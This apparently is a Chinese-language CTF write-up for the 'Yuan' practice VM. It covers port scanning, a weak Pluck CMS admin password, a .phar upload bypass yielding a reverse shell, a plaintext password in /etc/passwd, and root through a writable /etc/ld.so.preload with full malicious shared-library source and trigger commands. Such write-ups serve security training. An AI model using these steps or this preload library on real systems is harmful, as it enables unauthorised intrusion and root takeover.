Yuan

靶机说明

  • QQ群:660930334

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:30 CST
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00039s latency).
MAC Address: 08:00:27:6D:22:97 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.30
Host is up (0.00060s latency).
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.14 seconds

靶机IP:192.168.2.30

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.30                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:30 CST
Nmap scan report for 192.168.2.30
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.30 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:31 CST
Nmap scan report for 192.168.2.30
Host is up (0.00076s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze-Sec \xE5\x85\x83\xE6\x97\xA6\xE5\xBA\x86\xE7\xA5\x9D
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.30                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:32 CST
Nmap scan report for 192.168.2.30
Host is up (0.00098s latency).
All 100 scanned ports on 192.168.2.30 are in ignored states.
Not shown: 53 closed udp ports (port-unreach), 47 open|filtered udp ports (no-response)
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.70 seconds

二、WEB渗透

1、目录扫描

1
2
3
4
5
6
┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.30 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/index.html           (Status: 200) [Size: 16876]
/pluck                (Status: 301) [Size: 312] [--> http://192.168.2.30/pluck/]
...

找到目录/pluck,访问发现是pluck cms,版本为4.7.7

2、Pluck cms

1-弱口令登录

经过尝试,发现存在弱口令pluck

2-文件上传

找到文件上传,尝试上传php格式文件,发现变成了php.txt

使用phar进行替代,成功上传,反弹到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444       
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.30] 32776
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

1
2
3
4
5
6
7
8
script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

三、权限提升

1、获取Tommy4权限

查看/etc/passwd,找到用户tommy4的密码v3fXTfJ06cMMfAKGQwkZ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@Yuan:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tommy4:x:1000:1000:,v3fXTfJ06cMMfAKGQwkZ,:/home/tommy4:/bin/bash
xnzcode:x:1001:1001:,,,:/home/xnzcode:/bin/bash

成功获取到tommy4用户权限

1
2
3
4
www-data@Yuan:/home$ su tommy4
Password: 
tommy4@Yuan:/home$ id
uid=1000(tommy4) gid=1000(tommy4) groups=1000(tommy4)

2、获取root权限

查看全局可写的文件,排除/proc、/sys

1
2
3
4
5
6
7
8
9
10
11
tommy4@Yuan:~$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/etc/ld.so.preload
/var/www/html/pluck/data/settings/install.dat
/var/www/html/pluck/data/settings/pages/1.1.php
/var/www/html/pluck/data/settings/pages/2.maze-sec.php
/var/www/html/pluck/data/settings/themepref.php
/var/www/html/pluck/data/settings/pass.php
/var/www/html/pluck/data/settings/options.php
/var/www/html/pluck/data/settings/token.php
/var/www/html/pluck/data/settings/update_lastcheck.php
/var/www/html/pluck/images/rev.jpg

发现/etc/ld.so.preload可写

1
2
tommy4@Yuan:~$ ls -la /etc/ld.so.preload 
-rw-r--rw- 1 root root 0 Dec 20 06:27 /etc/ld.so.preload

这是一个经典的提权向量。/etc/ld.so.preload文件用于指定在程序启动时预加载的共享库,如果我们能控制这个文件,就可以让任何以root权限运行的非SUID程序加载我们的恶意共享库。

恶意共享库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
	unsetenv("LD_PRELOAD");
	if (getuid() == 0) {
		setgid(0);
		setuid(0);
		// 复制 bash 并设置 SUID 权限
		system("cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash");
	}
}

编译和使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#编译文件
gcc -fPIC -shared -nostartfiles -o shell.so shell.c
chmod 755 shell.so

#写入ld.so.preload
echo "/tmp/shell.so" > /etc/ld.so.preload

# 触发(访问网页或等待任意 root 进程执行)在攻击机上执行 
curl http://192.168.2.30

# 清除 ld.so.preload 
echo "" > /etc/ld.so.preload 

# 获取 root shell 
/tmp/rootbash -p

获取到root权限

1
2
3
tommy4@Yuan:/tmp$ /tmp/rootbash -p
rootbash-5.0# id
uid=1000(tommy4) gid=1000(tommy4) euid=0(root) groups=1000(tommy4)

四、查看flag

1
2
3
rootbash-5.0# cat /root/root.txt /home/tommy4/user.txt 
flag{root-6abd51ee921a5a9db30b78cf17d85dc7}
flag{user-96d6fc824b0ea03a4e3dbd81f9c5cd76}
Maze-sec
#文件上传 #弱口令 #cms-Pluck #提权-ld.so.preload
Yuan
http://miao-sec.github.io/Maze-sec/Yuan/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO